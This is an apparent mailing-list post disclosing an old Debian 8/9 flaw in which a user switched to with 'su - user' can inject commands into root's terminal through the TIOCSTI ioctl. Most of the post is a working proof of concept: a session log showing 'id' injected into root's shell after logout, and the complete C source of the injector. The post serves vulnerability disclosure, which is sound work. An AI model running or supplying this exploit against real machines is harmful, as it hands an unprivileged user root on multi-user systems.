Ancient "su - hostile" vulnerability in debian 8 and 9

Ancient "su - hostile" vulnerability in debian 8 and 9 Just FYI. Warning: This is rather old, since at least 2005, probably much earlier. Check the links at: http://www.openwall.com/lists/oss-security/2018/06/12/2 Summary: Doing "su - hostile" in debian 8 and 9 may lead to root privilege escalation. Default sudo -u probably is affected too. Per chat with some admins they use su - user. Session: root@machine1:~# su - guest4 guest4@machine1:~$ (sleep 10; /tmp/a.out id) & [1] 4737 guest4@machine1:~$ exit logout ### just wait root@machine1:~# id uid=0(root) gid=0(root) groups=0(root) root@machine1:~# cat /tmp/tty.c /* * * https://unix.stackexchange.com/questions/48103/construct-a-command-by-putting-a-string-into-a-tty * */ #include <sys/ioctl.h> #include <termios.h> #include <stdio.h> #include <stdlib.h> void stackchar(char c) { if (ioctl(0, TIOCSTI, &c) < 0) { perror("ioctl"); exit(1); } } int main(int argc, char *argv[]) { int i, j; char c; for (i = 1; i < argc; i++) { for (j=0; (c = argv[i][j]); j++) { stackchar(c); } stackchar('

'); } exit(0); }